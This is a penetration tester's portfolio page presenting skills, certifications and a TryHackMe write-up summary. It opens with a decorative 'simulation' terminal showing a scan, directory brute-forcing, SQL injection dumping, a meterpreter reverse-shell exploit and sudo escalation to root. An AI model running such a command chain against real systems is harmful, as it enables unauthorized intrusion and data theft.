BASED IN INDIA // AVAILABLE FOR WORK PORTFOLIO ©2026 /BREAKING SYSTEMS (LEGALLY) SINCE 2019 ONLINE · --:--:-- IST

PRATHAMESH
DABIR

Hey! I'm Prathamesh — a Penetration Tester & Bug Bounty Hunter ranked among TryHackMe's Top 10 in India. I break systems so attackers can't — hunting bugs, ripping CTFs, and hardening real-world security.

prathamesh@ops: ~/simulation — AUTHORIZED ENGAGEMENT

$ whoami

prathamesh-dabir // penetration tester

$ nmap -sS -T4 -p- 10.0.0.0/8

Scanning 65535 ports... [||||||||||] 100%

443/tcp open https

22/tcp open ssh

80/tcp filtered http

$ gobuster dir -u https://target.sys -w rockyou.txt

/admin (Status: 200)

/api (Status: 200)

/debug (Status: 200)

$ sqlmap -u "https://target.sys/api?id=1" --batch --level=5

[+] Parameter: id (GET) - Type: UNION query

[+] Database: prod_db

[+] Users table: 14,892 records

$ ./exploit --payload meterpreter --lhost 10.0.0.1 --lport 4444

[+] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.5:58932)

$ getuid

Server username: www-data (uid=33, gid=33)

$ sudo -l

(ALL) NOPASSWD: ALL

$ sudo su -

uid=0(root) gid=0(root) groups=0(root) ★ ROOT ACCESS ★

// DESCENT 00%
SIMULATION · NO SYSTEMS WERE HARMED

I BREAK THINGS
TO UNDERSTAND THEM.

Think like an attacker.
Defend like an engineer.
// OPERATING PRINCIPLE — EVERY ENGAGEMENT
Portrait of Prathamesh Dabir
CALLSIGN
prathamesh-dabir
ROLE
Penetration Tester
EDUCATION
M.Sc Cybersecurity
THM INDIA
TOP 10 ★
STATUS
● OPEN TO OPS
//CLICK TO FLIP
UID 0 (root)
GROUPS: pentest, bounty, ctf, secops
CLEARANCE: LEVEL-5 // TOP-10 IN
ACCESS: web · net · cloud · people
EXP: NEVER

PROPERTY OF A CURIOUS MIND.
IF FOUND, RETURN TO THE NEAREST TERMINAL.

Passionate cybersecurity professional with over three years of hands-on experience across penetration testing, vulnerability assessment and security operations. I thrive on solving complex security challenges and protecting organizations from evolving threats.

Ranked Top 10 on TryHackMe India, I live on the offensive side — bug bounty hunting, CTF competitions and platforms like HackTheBox Academy. Offensively minded, defensively useful. Off the clock I trade stocks, chasing market patterns the same way I chase attack vectors: patiently and analytically.

OFFENSIVE SECURITYSECURITY OPERATIONSCLOUD / AWS
Prathamesh by the sea
01 / WEST COAST
Prathamesh overlooking the hills
02 / OUTSIDE THE LAB
Prathamesh under outdoor lights
03 / AFTER HOURS
Prathamesh in a magenta-lit room
04 / RED TEAM ENERGY
Top 10TRYHACKME INDIA
M.ScCYBERSECURITY
3+ YRSHANDS-ON SECURITY
CTFS & BOUNTIES

What I do

//CAPABILITIES — OFFENSE INFORMS DEFENSE
/01

Penetration Testing

  • Web App Pentesting
  • Network Penetration
  • Vulnerability Assessment
  • External Pentest Playbook (TCM)
/02

Bug Bounty Hunting

  • Recon & Enumeration
  • Web & API Testing
  • Responsible Disclosure
  • Report Writing
/03

Security Operations

  • SecOps Research
  • SaaS Security Posture
  • CASB / Netskope
  • Threat Monitoring
/04

CTF & Community

  • TryHackMe Top 10 India
  • HackTheBox Academy
  • Metasploit Guest Sessions
  • Security Writeups
// TOOLS I USE DAILY
BURP SUITENMAP WIRESHARKMETASPLOIT
LINUXPYTHON FFUFSQLMAP
// SYSTEMS OVER SPECTACLE

Method,
made visible.

A good assessment is designed like a good interface: every signal has a place, every decision has context, and the final output is impossible to misread.

01 / RECON02 / MODEL03 / EXPLOIT04 / REPORT
ASSESSMENT / ATS-026 AUTHORIZED SCOPE
ENGAGEMENTEXTERNAL / WEB
ATTACK SURFACE14 TARGETS
STATUSREPORT READY
ATTACK PATH / VERIFIED04 STEPS
01RECONASSET ENUM
02FOOTHOLDWEB VECTOR
03ESCALATEIAM MISCONFIG
04IMPACTDATA ACCESS
FINDINGS13 TOTAL
CRITICAL02
HIGH04
MEDIUM07
EVIDENCE TRAILSHA256 / LOCKED

09:41:02 target verified inside signed scope

09:48:17 reproducible exploit path recorded

10:03:54 business impact mapped to control

10:16:31 remediation guidance attached

Field Ops

//SELECTED ENGAGEMENTS & ROLES
/ CASE FILE 01
// TRYHACKME · WEB EXPLOITATION

Pickle
Rick.

Source review, credential discovery, PHP command execution, blacklist bypass, Linux enumeration, and an unrestricted sudo path to root.

0TryHackMe India Rank — Top 10
0Machines Solved
0Valid BB Reports Acknowledged
0Certifications Earned

Credentials

//CERTS · RANKS · BADGES
★ TryHackMe India Top 10 CTF Player MCRTA CAP GCP TCM — External Pentest Playbook HTB Academy — Web Requests HTB — Intro to Web Applications M.Sc Cybersecurity Stock Trader
// PUBLISHED COVERAGE · JUNE 2026

Seen in
the wild.

A syndicated feature on Arica Tech Security's AI-native security mission names me as CTO and highlights my work across cybersecurity, AI/ML, and offensive security research.

READ THE FEATURE ↗

Intel Drops

//NOTES FROM THE FIELD

No blog posts published yet.

Approved articles will appear here automatically after publication.

//BROADCASTING ON AN ENCRYPTED CHANNEL

THE
SIGNAL

One transmission a month. Raw field notes from live engagements, the bugs that actually paid, CTF breakdowns, and the occasional market chart. No fluff, no spam — just intel you can use. Free. Unsubscribe anytime.

FIELD NOTES / NO TRACKING NEW ISSUE WHEN THERE'S SIGNAL

PGP-friendly · 0% spam · your address stays classified

  • Monthly deep-dive from a live-fire engagement
  • Tooling & automation drops before they hit the blog
  • Early access to new CTF writeups

Let's
talk.

Got a project, a bounty, or need someone to red-team your stack? Fill out the form or hit me up directly — I'll get back to you soon.